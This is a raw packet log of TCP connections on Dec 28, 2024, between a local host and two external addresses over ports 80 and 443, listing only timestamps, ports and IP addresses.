                                                                                                                                                                      Dec 28, 2024 09:33:29.923094034 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.923105001 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.923173904 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.923186064 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.923250914 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.923261881 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.923391104 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.923399925 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.923443079 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.923480988 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.923548937 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.923635006 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.923644066 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.923713923 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.923723936 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.923732996 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.952856064 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.952959061 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.997024059 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.040317059 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.040338039 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.040348053 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.040368080 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.040455103 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.040555954 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.040587902 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.040700912 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.041044950 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:30.041135073 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:30.041485071 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.041565895 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.041604042 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.041656017 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.041706085 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.041717052 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.041788101 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.041798115 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.041883945 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.041929007 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.042006969 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.042037010 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.042102098 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.042143106 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.042258024 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.042282104 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.042385101 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.042396069 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.042543888 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.042581081 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.042648077 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.042658091 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.042674065 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.042684078 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.042754889 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.042766094 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.042839050 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.042905092 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.042916059 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.042924881 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.042963982 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.042992115 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.043061972 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.043072939 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.043178082 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.043188095 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.043230057 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.043240070 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.043292046 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.043302059 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.043384075 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.043395996 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.043435097 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.043452978 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.043504000 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.043589115 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.043597937 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.043678999 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.043689013 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.043693066 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.043724060 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.043735027 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.043783903 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.043793917 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.044064045 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:30.161102057 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.161117077 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.161135912 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.161144972 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.161154032 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.161170959 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.161261082 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.161303997 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.161386967 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.161454916 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.161472082 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.161546946 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.161618948 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.161629915 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.161650896 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.161770105 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.161788940 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.161807060 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.161854982 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.161906958 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.161923885 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.162008047 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.162024975 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.162077904 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.162147045 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.162226915 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.162235975 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.162281036 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.162293911 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.162354946 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.162367105 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.162425995 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.162458897 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.162554026 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.162564039 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.162636042 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.162646055 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.162722111 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.162731886 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.162816048 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.162825108 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.162859917 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.162904978 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.162987947 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.162997007 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.163050890 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.163192034 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.163201094 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.163225889 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.163307905 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.163325071 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.163373947 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.163383961 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.163393021 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.163609028 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.163626909 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.163666964 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.163702011 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.163754940 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.163855076 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.163865089 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.163939953 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.163994074 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.164005041 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.164021015 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.164118052 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.164128065 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.164201021 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.164215088 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.164280891 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.164289951 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.164381027 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.164405107 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.164544106 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.164560080 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.164664030 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.164673090 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.164724112 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.164735079 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.164786100 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.164845943 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.164855957 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.164954901 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.164964914 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.164974928 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.165025949 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.165036917 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.165105104 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.165115118 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.165158033 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.165167093 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.165210962 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.165278912 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.165333033 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.165390015 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.165416956 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.165477991 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.165528059 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.165544987 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.165643930 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.165653944 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:30.165658951 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:35.191478014 CET49737443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:35.191546917 CET44349737172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:35.191667080 CET49737443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:35.221055031 CET49737443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:35.221102953 CET44349737172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:36.173595905 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:36.173652887 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:36.173729897 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:36.173957109 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:36.293440104 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:36.331926107 CET4973980192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:36.451487064 CET8049739194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:36.451733112 CET4973980192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:36.451956987 CET4973980192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:36.486852884 CET44349737172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:36.486952066 CET49737443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:36.491030931 CET49737443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:36.491060972 CET44349737172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:36.491508961 CET44349737172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:36.533962965 CET49737443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:36.572480917 CET8049739194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:36.592473030 CET49737443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:36.592499018 CET49737443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:36.592657089 CET44349737172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:38.914484024 CET8049739194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:38.914509058 CET8049739194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:38.914567947 CET4973980192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:38.914830923 CET4973980192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:39.034284115 CET8049739194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:39.063455105 CET4974080192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:39.183147907 CET8049740194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:39.183238983 CET4974080192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:39.183497906 CET4974080192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:39.302953959 CET8049740194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:40.774625063 CET8049740194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:40.774768114 CET8049740194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:40.774821043 CET4974080192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:40.774929047 CET4974080192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:40.894509077 CET8049740194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:56.739325047 CET44349737172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:56.739423037 CET44349737172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:56.739485025 CET49737443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:56.758080006 CET49737443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:56.758111000 CET44349737172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:56.772314072 CET49741443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:56.772387028 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:56.772484064 CET49741443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:56.772876978 CET49741443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:56.772897005 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:58.029063940 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:58.029226065 CET49741443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:58.033941984 CET49741443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:58.033955097 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:58.034250975 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:58.054164886 CET49741443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:58.054202080 CET49741443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:58.054302931 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:58.800940990 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:58.801017046 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:58.801057100 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:58.801075935 CET49741443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:58.801090002 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:58.801103115 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:58.801139116 CET49741443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:58.803957939 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:58.804016113 CET49741443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:58.804028034 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:58.812206984 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:58.812318087 CET49741443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:58.812330961 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:58.820506096 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:58.820564985 CET49741443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:58.820583105 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:58.862262964 CET49741443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:58.920547962 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:58.971652985 CET49741443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:58.971693039 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:59.005580902 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:59.005625010 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:59.005697966 CET49741443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:59.005712032 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:59.005727053 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:59.005773067 CET49741443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:59.005801916 CET49741443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:59.006005049 CET49741443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:59.006023884 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:59.006042004 CET49741443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:59.006047010 CET44349741172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:59.193862915 CET49742443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:59.193952084 CET44349742172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:59.194029093 CET49742443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:59.194346905 CET49742443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:33:59.194376945 CET44349742172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:00.455219030 CET44349742172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:00.455322027 CET49742443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:00.457129955 CET49742443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:00.457142115 CET44349742172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:00.457413912 CET44349742172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:00.458580971 CET49742443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:00.458749056 CET49742443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:00.458786964 CET44349742172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:00.458873034 CET49742443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:00.458880901 CET44349742172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:01.446429014 CET44349742172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:01.446525097 CET44349742172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:01.446624994 CET49742443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:01.446777105 CET49742443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:01.446805954 CET44349742172.67.128.184192.168.2.4
